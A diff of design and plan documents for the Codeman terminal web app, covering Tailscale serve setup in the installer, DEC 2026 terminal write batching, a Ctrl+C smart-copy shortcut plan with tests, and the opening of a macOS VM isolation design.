| Custom `CODEMAN_PORT` | Serve target uses the actual port; `install.sh tailscale` re-reads it from the service file. |
|
||||
| Funnel (public internet) | OUT OF SCOPE for v1. If ever added it must mirror the tunnel guard: refuse without `CODEMAN_PASSWORD` (`isUnauthenticatedNetworkAcknowledged`). Funnel exposes to the whole internet and is a different risk class than tailnet-only serve. Mention `tailscale funnel` in docs only, with the password warning. |
|
||||
| Uninstall | Best effort: if `serve status --json` shows 443 proxying to our port, run the targeted `tailscale serve --https=443 off` (still accepted by current CLIs); if the CLI rejects it, print manual instructions. Never touch other mappings, never uninstall tailscale itself. |
|
||||
| User already fronting Codeman some other way (reverse proxy etc.) | The serve check only looks at tailscale state; other proxies are invisible and unaffected (same stance as the loopback-exemption note in security-architecture). |
|
||||
|
||||
## What does NOT change
|
||||
|
||||
- Server code: no changes required. Host guard already trusts `.ts.net`,
|
||||
loopback bind is already the default, SSE/WS already work through serve.
|
||||
- The two existing binding options and their semantics, `read_existing_binding`
|
||||
preservation, and the LAN+password flow.
|
||||
- `scripts/tunnel.sh` / cloudflared support (stays as the "no Tailscale
|
||||
account" alternative).
|
||||
- The security model: this feature only ever narrows exposure (loopback +
|
||||
authenticated overlay), never widens it.
|
||||
|
||||
## Files touched (implementation inventory)
|
||||
|
||||
| File | Change |
|
||||
| ---- | ------ |
|
||||
| `install.sh` | New: `check_tailscale`, `get_tailscale_path`, `tailscale_status_field` (jq-free JSON field extraction; the installer cannot assume jq: use `sed`/`grep` like existing helpers or `tailscale status --json` piped to `node -e` since node is guaranteed post-install), `offer_install_tailscale`, `ensure_tailscale_login`, `ensure_tailscale_operator`, `ensure_tailnet_https`, `setup_tailscale_serve`, `verify_tailscale_access`, `setup_tailscale_access` (orchestrator). Modified: `choose_network_binding` (3-way menu), summary block, `print_security_notice`, subcommand dispatch (`tailscale`), `uninstall` (targeted serve removal), header env-var docs (`CODEMAN_TAILSCALE`). |
|
||||
| `README.md` | Remote-access section: promote the Tailscale path with the one-liner and `install.sh tailscale`; keep the tailscale-IP HTTP note for non-serve users but recommend serve + HTTPS. |
|
||||
| `docs/security-architecture.md` | Section A gains "the installer can set this up for you" + `install.sh tailscale` pointer. |
|
||||
| `CLAUDE.md` | One line in Scripts & Tunnel: installer offers Tailscale setup (`install.sh tailscale` to redo). |
|
||||
| `test/` | No unit tests possible for interactive bash + a live tailnet; guard with `shellcheck install.sh` (already the norm) and the manual matrix below. |
|
||||
|
||||
## Manual test matrix (before release)
|
||||
|
||||
1. Linux + tailscale absent: install offered, declined => loopback fallback + hint.
|
||||
2. Linux + tailscale absent: install accepted => full flow => URL verified.
|
||||
3. Logged out => auth URL flow => Running => serve configured.
|
||||
4. Tailnet with HTTPS certs disabled => guided instructions => re-check => success; and the skip branch.
|
||||
5. Re-run installer with serve already configured => idempotent, preserved, reported.
|
||||
6. Second serve mapping on another port present => untouched (prod-like state).
|
||||
7. Port 443 already proxying another target => replace/skip prompt honored.
|
||||
8. `install.sh tailscale` on an existing loopback install (the retrofit path).
|
||||
9. `CODEMAN_NONINTERACTIVE=1` re-run => preserves everything, no prompts.
|
||||
10. macOS (Mac mini `arbbot` box): GUI-app CLI path detection + full flow.
|
||||
11. Uninstall removes only our 443 mapping, leaves others.
|
||||
12. Phone check: PWA install + push from the `https://*.ts.net` origin.
|
||||
|
||||
## Release
|
||||
|
||||
Changeset: `minor` (new documented installer capability + new `CODEMAN_TAILSCALE`
|
||||
env var). The feature is installer-only, so it ships with zero risk to running
|
||||
servers; `install.sh update` does not invoke the new flow (updates never rewrite
|
||||
access config), only fresh installs and the explicit `install.sh tailscale`
|
||||
subcommand do.
|
||||
@@ -43,38 +43,22 @@ const syncData = DEC_SYNC_START + data + DEC_SYNC_END;
|
||||
this.broadcast('session:terminal', { id: sessionId, data: syncData });
|
||||
```
|
||||
|
||||
## Client-Side Implementation (`app.js`)
|
||||
## Client-Side Implementation (`terminal-ui.js`)
|
||||
|
||||
### `batchTerminalWrite(data)`
|
||||
|
||||
1. Checks if flicker filter is enabled (optional, per-session)
|
||||
2. If flicker filter active: buffers screen-clear patterns (`ESC[2J`, `ESC[H ESC[J`, `ESC[nA`)
|
||||
3. Accumulates data in `pendingWrites`
|
||||
4. Schedules `requestAnimationFrame` if not already scheduled
|
||||
5. On rAF callback: checks for incomplete sync blocks (start without end)
|
||||
6. If incomplete: waits up to 50ms via `syncWaitTimeout`
|
||||
7. Calls `flushPendingWrites()` when complete
|
||||
|
||||
### `extractSyncSegments(data)`
|
||||
|
||||
- Parses DEC 2026 markers, returns array of content segments
|
||||
- Content before sync blocks returned as-is
|
||||
- Content inside sync blocks returned without markers
|
||||
- Incomplete blocks (start without end) returned with marker for next chunk
|
||||
4. Calls `_scheduleTerminalWriteFlush()` if no flush is pending
|
||||
5. The yielded callback clears its scheduled flag before calling `flushPendingWrites()`
|
||||
6. Large batches schedule their own next chunk until the queue is empty
|
||||
|
||||
### `flushPendingWrites()`
|
||||
|
||||
```javascript
|
||||
const segments = extractSyncSegments(this.pendingWrites);
|
||||
this.pendingWrites = ''; // Clear before writing
|
||||
for (const segment of segments) {
|
||||
if (segment && !segment.startsWith(DEC_SYNC_START)) {
|
||||
terminal.write(segment); // Skip incomplete blocks (start with marker)
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Note: Segments starting with `DEC_SYNC_START` are incomplete blocks awaiting more data. These are skipped (discarded if timeout forces flush).
|
||||
- Joins the queued terminal data and passes DEC 2026 markers through to xterm.js 6, which handles synchronized output natively.
|
||||
- Writes at most 32KB per yield for Codex and 64KB for other modes.
|
||||
- Requeues the remainder and immediately schedules another safe yield. A final large response therefore drains without waiting for another SSE event.
|
||||
|
||||
### `chunkedTerminalWrite(buffer, chunkSize=128KB)`
|
||||
|
||||
@@ -116,17 +100,15 @@ When detected, buffers 50ms of subsequent output before flushing atomically.
|
||||
|
||||
## Edge Cases
|
||||
|
||||
- **Incomplete sync blocks**: 50ms timeout forces flush (content discarded to prevent freeze)
|
||||
- **Incomplete sync blocks**: xterm.js retains synchronized output until its closing marker
|
||||
- **Large buffers**: Chunked writing prevents UI freeze
|
||||
- **Server shutdown**: Skips batching via `_isStopping` flag
|
||||
- **Session switch**: Clears flicker filter state, pending writes, and sync timeout (prevents cross-session data bleed)
|
||||
- **SSE reconnect**: `handleInit()` clears all pending write state
|
||||
|
||||
**Trade-off:** If a sync block is split across SSE packets and the end marker doesn't arrive within 50ms, the incomplete content is discarded. This prioritizes responsiveness over completeness. In practice this is rare since the server always sends complete `SYNC_START...SYNC_END` pairs and SSE typically delivers them atomically.
|
||||
|
||||
## DEC Mode 2026 Compatibility
|
||||
|
||||
Terminals that natively support DEC 2026 will buffer and render atomically. Terminals that don't support it ignore the escape sequences harmlessly. xterm.js doesn't support DEC 2026 natively, so the client implements its own buffering by parsing the markers.
|
||||
Terminals that natively support DEC 2026 buffer and render atomically. Codeman uses xterm.js 6, so the client passes the markers through instead of parsing or discarding partial blocks.
|
||||
|
||||
**Supporting terminals:** WezTerm, Kitty, Ghostty, iTerm2 3.5+, Windows Terminal, VSCode terminal
|
||||
|
||||
@@ -135,4 +117,4 @@ Terminals that natively support DEC 2026 will buffer and render atomically. Term
|
||||
| File | Key Functions |
|
||||
|------|---------------|
|
||||
| `src/web/server.ts` | `batchTerminalData()`, `flushTerminalBatches()`, `broadcast()` |
|
||||
| `src/web/public/app.js` | `batchTerminalWrite()`, `extractSyncSegments()`, `flushPendingWrites()`, `flushFlickerBuffer()`, `chunkedTerminalWrite()` |
|
||||
| `src/web/public/terminal-ui.js` | `batchTerminalWrite()`, `_scheduleTerminalWriteFlush()`, `flushPendingWrites()`, `flushFlickerBuffer()`, `chunkedTerminalWrite()` |
|
||||
|
||||
@@ -0,0 +1,303 @@
|
||||
# Terminal smart copy (Ctrl+C) plan
|
||||
|
||||
Issue: [#211](https://github.com/Ark0N/Codeman/issues/211) "Terminal: Ctrl+C should copy when text is selected (interrupt otherwise)".
|
||||
Origin: r/selfhosted feedback, "Biggest stumbling block is apparent lack of copy-paste in the terminal."
|
||||
|
||||
Status: **implemented and shipped** on 2026-08-05 (this document is kept as the rationale record). It was first served as an isolated beta over Tailscale for manual sign-off, then landed. Section 2 is the research that shaped the design, sections 4 to 6 describe what was built.
|
||||
|
||||
---
|
||||
|
||||
## 1. What the issue asks for
|
||||
|
||||
- Text selected in the terminal + `Ctrl+C` -> copy the selection, toast, clear the selection, do NOT send the byte to the PTY.
|
||||
- No selection + `Ctrl+C` -> unchanged, the interrupt (`0x03`) reaches the PTY.
|
||||
- `Ctrl+Shift+C` as an explicit copy chord.
|
||||
- The selection check must run before the shortcut registry dispatch so a rebind cannot cost the user their interrupt key.
|
||||
- Paste is out of scope (it already works via `Ctrl+V`, which terminal-ui.js routes to the image/text paste trap).
|
||||
|
||||
## 2. Verified current behavior
|
||||
|
||||
### 2.1 xterm cancels the Ctrl+C keydown, so no copy can happen
|
||||
|
||||
`src/web/public/vendor/xterm.min.js` (xterm 6.x), `_keyDown`:
|
||||
|
||||
```js
|
||||
_keyDown(x){ if(this._keyDownHandled=!1, this._keyDownSeen=!0,
|
||||
this._customKeyEventHandler && this._customKeyEventHandler(x)===!1) return !1;
|
||||
... evaluateKeyboardEvent(...) ... this.cancel(x) ... }
|
||||
```
|
||||
|
||||
Two consequences that shape the design:
|
||||
|
||||
1. The custom handler runs **first**, before xterm evaluates the key. Returning `false` exits before `cancel(x)`, so returning `false` does **not** call `preventDefault()` for us.
|
||||
2. When the handler returns `true`, xterm turns Ctrl+C into `0x03` and cancels the event, which is why the browser's own copy command never runs.
|
||||
|
||||
Probe (headless chromium against an isolated server on port 3174, selection active, real focus on `.xterm-helper-textarea`, synthetic Ctrl+C keydown):
|
||||
|
||||
```json
|
||||
{ "hasSelection": true, "defaultPrevented": true, "dataSeen": ["\"\\u0003\""],
|
||||
"clipboardAfter": "SENTINEL-BEFORE", "stillHasSelection": false }
|
||||
```
|
||||
|
||||
So today: interrupt byte sent, clipboard untouched, and xterm drops the selection anyway. The last point matters, "copy then clear the selection" is not a behavior change in how the selection feels, it is what already happens on any keypress.
|
||||
|
||||
### 2.2 Why right-click Copy works today
|
||||
|
||||
xterm registers a `copy` listener on its root element that substitutes the selection text:
|
||||
|
||||
```js
|
||||
this._register(addDisposableListener(this.element,"copy",(k=>{ this.hasSelection() && copyHandler(k,this._selectionService) })))
|
||||
```
|
||||
|
||||
Second probe (port 3175, real `page.keyboard.press('Control+c')`, custom handler patched to return `false` for Ctrl+C without `preventDefault`):
|
||||
|
||||
```json
|
||||
{ "dataSeen": [], "copyEvents": ["xterm-element"],
|
||||
"clipboardAfter": "native-copy-probe-line\n...", "stillHasSelection": true }
|
||||
```
|
||||
|
||||
So a "return false and let the browser copy" implementation would also work in Chromium. It is rejected below (section 3.3) because it gives no toast, does not clear the selection, and leans on per-browser behavior of the copy command when the focused element is xterm's empty helper textarea.
|
||||
|
||||
### 2.3 The document-level capture handler will not interfere
|
||||
|
||||
`setupEventListeners()` in `src/web/public/app.js:989` runs on document capture, before xterm's textarea listener. Its registry loop skips any entry whose action is not in the local `SHORTCUT_ACTIONS` map:
|
||||
|
||||
```js
|
||||
if (shortcut.disabled || !shortcut.action) continue;
|
||||
const action = SHORTCUT_ACTIONS[shortcut.action];
|
||||
if (!action) continue;
|
||||
```
|
||||
|
||||
This is exactly how `command-palette` already behaves: it is a full registry entry (rebindable and disableable in App Settings) whose dispatch happens in a dedicated, focus-aware gate rather than the generic loop. The new copy entry follows that pattern, so the capture handler falls through untouched and the terminal handler owns the decision.
|
||||
|
||||
### 2.4 Registry matching rules that constrain the bindings
|
||||
|
||||
`matchesShortcutEvent()` (`app.js:4890`):
|
||||
|
||||
- Ctrl and Cmd are interchangeable as the primary modifier, so a `['ctrl']` binding also matches Cmd+C on macOS. That is fine here: with a selection it copies (same result the native macOS path gives today), without one it falls through.
|
||||
- Every other modifier must be declared exactly: `if (mods.includes('shift') !== !!e.shiftKey) return false`. So `Ctrl+Shift+C` needs its own binding, a plain `ctrl+c` binding will never swallow it.
|
||||
- `binding.code` wins when present, otherwise `binding.key` is compared case-insensitively.
|
||||
|
||||
### 2.5 Where selection is actually possible
|
||||
|
||||
- The server strips mouse-tracking DECSETs for `claude`, `codex`, and `gemini` (`isAltScreenStripMode`, `src/session.ts:179`), which is why plain drag-select works in those tabs even though the TUI has mouse tracking on.
|
||||
- `shell`, `opencode`, and `antigravity` keep mouse reporting, so xterm requires `Shift`+drag to force a selection there. Worth one line in the docs, it is not a code change.
|
||||
- Touch devices deliberately disable selection entirely (`body.touch-device .terminal-container .xterm{user-select:none !important}`, `styles.css:3196`), and phones have no Ctrl key. This feature is desktop and hardware-keyboard only, with no mobile regression surface.
|
||||
|
||||
### 2.6 Helpers that already exist and should be reused
|
||||
|
||||
| Need | Existing code |
|
||||
| --- | --- |
|
||||
| Clipboard write with an HTTP-safe fallback | `_copyText(text)` in `app.js:1887` (Clipboard API, then hidden textarea + `execCommand`) |
|
||||
| Toast | `showToast(message, type)` in `panels-ui.js:4385` |
|
||||
| Translated string | `'Copied to clipboard'` already in `i18n.js:453` |
|
||||
| Focus-aware chord gate to copy the shape of | `shouldOpenCommandPaletteFromShortcut(e)` in `panels-ui.js:285` |
|
||||
| Buffer-wide copy (currently unreferenced) | `copyTerminal()` in `terminal-ui.js:2615` |
|
||||
|
||||
`_copyText` matters more than it looks: `install.sh`'s LAN option serves plain HTTP, where `navigator.clipboard` is undefined. The issue's suggested `navigator.clipboard.writeText` alone would silently do nothing for those users, the `execCommand` fallback covers them.
|
||||
|
||||
## 3. Design
|
||||
|
||||
### 3.1 Behavior
|
||||
|
||||
| Chord | Selection present | No selection |
|
||||
| --- | --- | --- |
|
||||
| `Ctrl+C` (and Cmd+C, per registry equivalence) | copy, toast, clear selection, swallow the key | fall through, xterm sends `0x03` (interrupt) |
|
||||
| `Ctrl+Shift+C` | copy, toast, clear selection, swallow the key | swallow, no-op (see 3.2) |
|
||||
| Shortcut disabled in App Settings | never copies, `Ctrl+C` is always the interrupt | unchanged |
|
||||
| Rebound to another chord | that chord copies when a selection exists | plain `Ctrl+C` is always the interrupt |
|
||||
|
||||
### 3.2 Why `Ctrl+Shift+C` with no selection is swallowed rather than forwarded
|
||||
|
||||
Today `Ctrl+Shift+C` produces `0x03` as well (the shift is irrelevant to the control byte), so forwarding would be "no regression". But once the chord is advertised as *the explicit copy key*, letting it interrupt a running agent when the selection happens to be empty is a footgun with no upside. Swallowing costs nothing: a user who wants to interrupt has `Ctrl+C` right there.
|
||||
|
||||
The rule in code is "no selection and the matched chord had Shift -> swallow", not a hardcoded key check, so it stays correct under rebinds.
|
||||
|
||||
### 3.3 Why an explicit clipboard write rather than falling through to the native copy
|
||||
|
||||
Probe 2 showed the native path works in Chromium, but the explicit write is chosen because it:
|
||||
|
||||
- gives the "Copied to clipboard" toast, which is the discoverability half of the issue,
|
||||
- clears the selection so a second `Ctrl+C` interrupts (the smart-copy contract),
|
||||
- works on plain-HTTP LAN installs through `_copyText`'s `execCommand` fallback,
|
||||
- does not depend on how each browser treats a copy command issued while an empty textarea has focus.
|
||||
|
||||
### 3.4 Why no new app setting
|
||||
|
||||
Per-shortcut enable/disable and rebinding already exist in App Settings -> Shortcuts and are driven by the registry. A user who wants "Ctrl+C is always interrupt" unchecks one box. Adding a `terminalSmartCopy` setting would duplicate that and would drag in the per-device vs synced decision (`displayKeys` + `.strict()` `SettingsUpdateSchema`) for no gain.
|
||||
|
||||
## 4. Code changes, file by file
|
||||
|
||||
### 4.1 `src/web/public/app.js`, registry entry
|
||||
|
||||
Add to `DEFAULT_SHORTCUTS` (after the `clear-terminal` entry, ~line 351) so the Terminal group stays together:
|
||||
|
||||
```js
|
||||
{
|
||||
id: 'copy-selection',
|
||||
group: 'Terminal',
|
||||
label: 'Copy Selection',
|
||||
bindings: [
|
||||
{ modifiers: ['ctrl'], key: 'c' },
|
||||
{ modifiers: ['ctrl', 'shift'], key: 'C' },
|
||||
],
|
||||
// Dispatched by shouldCopyTerminalSelectionFromShortcut() in terminal-ui.js,
|
||||
// deliberately NOT in SHORTCUT_ACTIONS: the generic capture loop always
|
||||
// preventDefaults, which would cost the user the interrupt key.
|
||||
action: 'copyTerminalSelection',
|
||||
},
|
||||
```
|
||||
|
||||
Match on `key`, not `code`. xterm decides what byte to emit from the produced character, so intercepting the physical `KeyC` on a layout where it does not produce "c" would diverge from what xterm would have sent.
|
||||
|
||||
The `action` string is required for App Settings to render the row as configurable (`configurable = !!shortcut.action && Array.isArray(shortcut.bindings)`, `settings-ui.js:2624`). Do **not** add `copyTerminalSelection` to `SHORTCUT_ACTIONS`.
|
||||
|
||||
### 4.2 `src/web/public/terminal-ui.js`, the gate
|
||||
|
||||
New prototype method, modeled on `shouldOpenCommandPaletteFromShortcut`:
|
||||
|
||||
```js
|
||||
shouldCopyTerminalSelectionFromShortcut(ev) {
|
||||
if (!ev || ev.type !== 'keydown') return false; // the handler also runs for keypress/keyup
|
||||
if (!ev.ctrlKey && !ev.metaKey && !ev.altKey) return false; // hot path: plain typing exits here
|
||||
const registryAvailable =
|
||||
typeof this.getShortcutRegistry === 'function' && typeof this.matchesShortcutEvent === 'function';
|
||||
const entry = registryAvailable
|
||||
? this.getShortcutRegistry().find((s) => s.id === 'copy-selection')
|
||||
: null;
|
||||
if (entry) return !entry.disabled && this.matchesShortcutEvent(ev, entry);
|
||||
return (ev.key || '').toLowerCase() === 'c' && !ev.altKey; // fallback for isolated harnesses
|
||||
}
|
||||
```
|
||||
|
||||
### 4.3 `src/web/public/terminal-ui.js`, the branch
|
||||
|
||||
Inside `attachCustomKeyEventHandler` (`terminal-ui.js:133`), after the command-palette gate and before the `Ctrl+V` branch:
|
||||
|
||||
```js
|
||||
// Smart copy (#211): with a selection, Ctrl+C copies instead of sending ^C.
|
||||
// With no selection it MUST fall through (return true, no preventDefault) or
|
||||
// the interrupt key is lost. Ctrl+Shift+C is the explicit chord and never
|
||||
// falls through: an "explicit copy" that interrupts the agent is a footgun.
|
||||
if (this.shouldCopyTerminalSelectionFromShortcut?.(ev)) {
|
||||
const selection = this.terminal.hasSelection?.() ? this.terminal.getSelection() : '';
|
||||
if (selection) {
|
||||
ev.preventDefault();
|
||||
void this.copyTerminalSelection(selection);
|
||||
return false;
|
||||
}
|
||||
if (ev.shiftKey) {
|
||||
ev.preventDefault();
|
||||
return false;
|
||||
}
|
||||
return true;
|
||||
}
|
||||
```
|
||||
|
||||
`preventDefault()` is explicit because returning `false` alone does not cancel the event (section 2.1), and without it the browser would run its own copy on top of ours.
|
||||
|
||||
### 4.4 `src/web/public/terminal-ui.js`, the copy action
|
||||
|
||||
```js
|
||||
async copyTerminalSelection(text) {
|
||||
const selection = text ?? (this.terminal.hasSelection?.() ? this.terminal.getSelection() : '');
|
||||
if (!selection) return false;
|
||||
const ok = await this._copyText(selection);
|
||||
if (ok) {
|
||||
this.terminal.clearSelection?.();
|
||||
this.showToast('Copied to clipboard', 'success');
|
||||
} else {
|
||||
this.showToast('Failed to copy', 'error');
|
||||
}
|
||||
// _copyText's execCommand fallback focuses a temp textarea; restore the
|
||||
// terminal (this.terminal.focus is the CJK-aware router, not xterm's raw focus).
|
||||
this.terminal.focus();
|
||||
return ok;
|
||||
}
|
||||
```
|
||||
|
||||
The selection text is captured **before** the first `await`, and `navigator.clipboard.writeText` is reached in the same task as the keydown, so user activation still holds.
|
||||
|
||||
### 4.5 `src/web/public/i18n.js`
|
||||
|
||||
`'Copied to clipboard'` exists. Add `'Failed to copy': '复制失败'` (the error path is new to this surface).
|
||||
|
||||
### 4.6 Documentation
|
||||
|
||||
| File | Change |
|
||||
| --- | --- |
|
||||
| `README.md` shortcut table (~line 648) | `\| `Ctrl/Cmd+C` \| Copy selection (interrupts when nothing is selected) \|` and a `Ctrl+Shift+C` row |
|
||||
| `src/web/public/index.html` help modal, Terminal section (~line 641) | `<div><kbd>Ctrl</kbd>+<kbd>C</kbd></div><div>Copy Selection / Interrupt</div>` plus the Ctrl+Shift+C row. Keep the existing negative assertion in `help-modal-shortcuts.test.ts` in mind (it forbids `Ctrl+K`, `C` is fine) |
|
||||
| `CLAUDE.md` "Keyboard shortcuts" line | add `Ctrl+C` (copy selection, else interrupt) and `Ctrl+Shift+C` |
|
||||
| `docs/architecture-invariants.md` -> "Command palette and shortcut registry" | append the invariant: the no-selection path must return `true` without `preventDefault`, the branch is keydown-only, and `copyTerminalSelection` must stay out of `SHORTCUT_ACTIONS` |
|
||||
|
||||
The shortcut overlay (`Ctrl+?`) and App Settings -> Shortcuts are registry-driven and pick the entry up with no edit.
|
||||
|
||||
## 5. Edge cases and risks
|
||||
|
||||
| Case | Handling |
|
||||
| --- | --- |
|
||||
| Handler also fires for `keypress`/`keyup` | gated on `ev.type === 'keydown'`. xterm's `_keyPress` bails on ctrl combos anyway, so no stray byte |
|
||||
| CJK IME composing | the existing `isComposing || keyCode === 229` guard is the first line of the handler and stays first |
|
||||
| Local echo overlay has unsent `pendingText` | the copy branch returns before `onData`, so `pendingText`, flushed offsets and the durable input queue are untouched. The no-selection path is byte-identical to today, including the "control char flushes buffered text then sends `0x03`" logic at `terminal-ui.js:895` |
|
||||
| Plain HTTP (LAN install) | `_copyText` falls back to `execCommand`, then focus is restored |
|
||||
| Clipboard write rejected (permissions policy, no gesture) | error toast, right-click Copy still available |
|
||||
| Whitespace-only or empty selection | `getSelection()` empty string is treated as "no selection", so Ctrl+C still interrupts |
|
||||
| macOS Cmd+C | registry treats ctrl/meta as interchangeable, so with a selection it takes our path (same visible result as today's native copy), without one it falls through |
|
||||
| Chrome/Firefox `Ctrl+Shift+C` is the devtools inspect chord | browser-level and may still toggle devtools, our copy runs regardless. Document as a caveat, `Ctrl+C` is the primary path |
|
||||
| Selection in a tab whose TUI owns the mouse (`shell`/`opencode`/`antigravity`) | unchanged, `Shift`+drag selects, then Ctrl+C copies |
|
||||
| Web tab (iframe dashboard) focused | xterm handler never runs, browser-native copy inside the iframe |
|
||||
| Teammate/subagent terminals (`panels-ui.js:2268`, `onData` wired) | same limitation exists there, out of scope for this PR (section 8) |
|
||||
|
||||
## 6. Test plan
|
||||
|
||||
New file `test/terminal-copy-selection.test.ts` (node env, `vm` harness in the style of `test/command-palette-ui.test.ts`), covering `shouldCopyTerminalSelectionFromShortcut` in isolation:
|
||||
|
||||
1. Ctrl+C keydown -> true, keyup/keypress of the same chord -> false.
|
||||
2. Ctrl+Shift+C -> true, plain `c` -> false, Ctrl+K -> false.
|
||||
3. Registry entry `disabled: true` -> false for every chord.
|
||||
4. Rebound entry (for example Alt+Y) -> true for the rebind, false for Ctrl+C.
|
||||
5. Missing registry (harness without `getShortcutRegistry`) -> falls back to the `c` check.
|
||||
|
||||
Static assertions appended to `test/keyboard-shortcuts.test.ts` (this suite already pins the xterm-handler chokepoint):
|
||||
|
||||
6. `DEFAULT_SHORTCUTS` contains `id: 'copy-selection'` and `SHORTCUT_ACTIONS` does **not** contain `copyTerminalSelection` (the interrupt-safety invariant).
|
||||
7. `terminal-ui.js` contains the `shouldCopyTerminalSelectionFromShortcut` branch and a `return true` no-selection fall-through.
|
||||
8. README + help modal rows exist (mirrors the existing palette/Alt-nav doc assertions).
|
||||
|
||||
`test/help-modal-shortcuts.test.ts`: add `expectShortcut(helpModal, ['Ctrl', 'C'], 'Copy Selection')`.
|
||||
|
||||
New browser test `test/terminal-copy-shortcut.test.ts` (Playwright, port **3174**, free per a scan of `test/`), following `test/webgl-fallback.test.ts`: boot `WebServer`, grant `clipboard-read`/`clipboard-write`, `terminal.write()` a known line, `selectLines()`, real `page.keyboard.press('Control+c')`, then assert clipboard content, empty `onData` capture, cleared selection and the toast. Second case: no selection, assert `onData` saw `\u0003` and the clipboard is unchanged.
|
||||
Per repo convention, browser suites are excluded from CI, so add the filename to the exclude list in `config/vitest.ci.config.ts` and run it locally.
|
||||
|
||||
Regression runs: `npm test -- test/keyboard-shortcuts.test.ts`, `test/help-modal-shortcuts.test.ts`, `test/command-palette-ui.test.ts`, `test/input-send-order.test.ts`, then `npm run test:ci`.
|
||||
|
||||
## 7. Manual verification before COM (CLAUDE.md rule)
|
||||
|
||||
Against a throwaway session on the live instance (`curl -sk https://localhost:3000/...`, never w1/w2/w3):
|
||||
|
||||
1. Select output with the mouse, press Ctrl+C, confirm the toast, paste elsewhere, confirm the agent did not stop.
|
||||
2. Press Ctrl+C again with nothing selected, confirm the agent interrupts.
|
||||
3. Type a few characters with local echo on (phone or `localEchoEnabled` forced), press Ctrl+C with no selection, confirm buffered text plus interrupt behave as before.
|
||||
4. Uncheck the shortcut in App Settings -> Shortcuts, confirm Ctrl+C always interrupts even with a selection.
|
||||
5. Rebind it, confirm the new chord copies and Ctrl+C reverts to pure interrupt.
|
||||
6. Repeat 1 and 2 in an `opencode` or `shell` tab using Shift+drag to select.
|
||||
7. Load over plain HTTP (`--host` LAN or `http://127.0.0.1:<port>`) and confirm the `execCommand` fallback copies and focus returns to the terminal.
|
||||
8. Mobile smoke: confirm nothing changed (selection is CSS-disabled, no Ctrl key).
|
||||
|
||||
## 8. Out of scope, follow-ups worth filing separately
|
||||
|
||||
- **Teammate/subagent terminals** (`panels-ui.js:2268`) have the same blocked-copy problem. One `attachCustomKeyEventHandler` reusing `copyTerminalSelection` would fix them, but it touches a different surface and deserves its own change.
|
||||
- **A mobile copy affordance.** Selection is disabled on touch, so phones still cannot copy terminal text. The unreferenced `copyTerminal()` (whole buffer) plus a keyboard-accessory "Copy" button would be the cheapest answer.
|
||||
- **Right-click context menu** with Copy/Paste, better discoverability than any chord, but a bigger UI surface.
|
||||
- **`copyTerminal()` cleanup**: it uses raw `navigator.clipboard` rather than `_copyText`, so it would fail on plain HTTP if ever wired up.
|
||||
|
||||
## 9. PR mechanics
|
||||
|
||||
- Branch off `master` (verify with `git branch --show-current`, the tree is shared), stage explicit paths only.
|
||||
- Files touched: `src/web/public/app.js`, `src/web/public/terminal-ui.js`, `src/web/public/i18n.js`, `src/web/public/index.html`, `README.md`, `CLAUDE.md`, `docs/architecture-invariants.md`, `docs/terminal-copy-shortcut-plan.md`, three test files, `config/vitest.ci.config.ts`.
|
||||
- `index.html`, `app.js` and `terminal-ui.js` are `.prettierignore`d hand-formatted assets, match the surrounding style by hand. `npm run check:public-assets` and `npm run check:frontend-syntax` are the guards.
|
||||
- No changeset in this PR: a merged, unconsumed changeset turns the Release workflow red until the next COM, and the COM flow writes release notes covering everything since the last tag (current version is 1.10.0).
|
||||
- Close #211 from the PR body.
|
||||
|
||||
Rough size: about 60 lines of product code, most of the work is the tests and the four documentation surfaces.
|
||||
@@ -1,6 +1,6 @@
|
||||
# Plan Usage Limits Display — Design & As-Built
|
||||
|
||||
> **Status: SHIPPED — deployed to prod + pushed to master, not yet released (2026-06-14).** Opt-in via App Settings → Display → **Plan Usage Limits** (`showPlanUsageLimits`, default OFF). Commits `c82f6c8` (feature) → `4d9d93d` (end-to-end fixes) → `eae225b` (per-user reconcile) → `95fb5fc` (init-snapshot replay). Full suite green (2869), CI green. No changeset/version bump yet.
|
||||
> **Status: SHIPPED — deployed to prod + pushed to master, not yet released (2026-06-14).** App Settings → Display → **Plan Usage Limits** (`showPlanUsageLimits`). **Default changed in 1.9.3: desktop now defaults ON, handhelds stay OFF, resolved via `planUsageChipEnabled()`.** The per-device notes further down describing it as opt-in/synced record the original 2026-06-14 shape, not current behavior. Commits `c82f6c8` (feature) → `4d9d93d` (end-to-end fixes) → `eae225b` (per-user reconcile) → `95fb5fc` (init-snapshot replay). Full suite green (2869), CI green. No changeset/version bump yet.
|
||||
>
|
||||
> Two surfaces from one `statusLine` callback:
|
||||
> - **Header chip** (top-right) — account-wide **plan limits**: `5h 35% · 7d 38%`, per-window green/yellow/red.
|
||||
|
||||
@@ -75,5 +75,5 @@ allowance. The commitments above take effect at `1.0.0`.
|
||||
## See also
|
||||
|
||||
- `CLAUDE.md` — the COM release workflow (changesets, version bump, deploy)
|
||||
- `SECURITY.md` — security reporting and the supported-version policy
|
||||
- `.github/SECURITY.md` — security reporting and the supported-version policy
|
||||
- `docs/security-architecture.md` — the full trust model
|
||||
|
||||
@@ -0,0 +1,201 @@
|
||||
<!-- Design doc drafted 2026-07-28 from WWDC26 session 224 research. STATUS: PLANNED, NOT IMPLEMENTED. Blocked on macOS 27 "Golden Gate" (beta now, GA expected fall 2026). -->
|
||||
|
||||
# VM Cases (macOS Virtualization framework), Implementation Plan
|
||||
|
||||
## Status
|
||||
|
||||
PLANNED, nothing implemented. This is the design + phased execution plan for a native-macOS VM isolation tier for cases ("the VM subsystem"), modeled on Docker cases (`docs/docker-cases-plan.md`). Testbed prerequisite: a macOS 27 host (see Section 8).
|
||||
|
||||
**⚠ DESIGN DIRECTION (owner, 2026-07-29): the subsystem is GUI-first.** Users want real macOS desktops, not headless SSH machines. Guests may be macOS (GUI-only in practice) or Linux (GUI or headless). Key decision 3 below carries the full consequences; anything in this doc that reads as "Linux-first / headless-first" predates this and has been revised.
|
||||
|
||||
**2026-07-29: Phase 0 substantially validated on the beta testbed; full Apple-stack reference now lives in [`docs/vm-subsystem-apple-stack.md`](vm-subsystem-apple-stack.md)** (API surfaces, beta bugs, our empirical results, and design implications). Plan-relevant corrections from that work: vmnet's topology/port-forwarding APIs are macOS 26 (only the loopback fix is 27); guest provisioning is macOS-guests-only (Linux stays cloud-init, proven working); DiskImageKit has NO flatten/merge, so the `export` subcommand ships the layer chain (or flattens in-guest) instead of flattening; seed ISOs are base-build-time only, never attached at case runtime; per-case EFI variable stores are mandatory; guest health checks read DHCP leases, never serial/ping.
|
||||
|
||||
## 1. Context and motivation
|
||||
|
||||
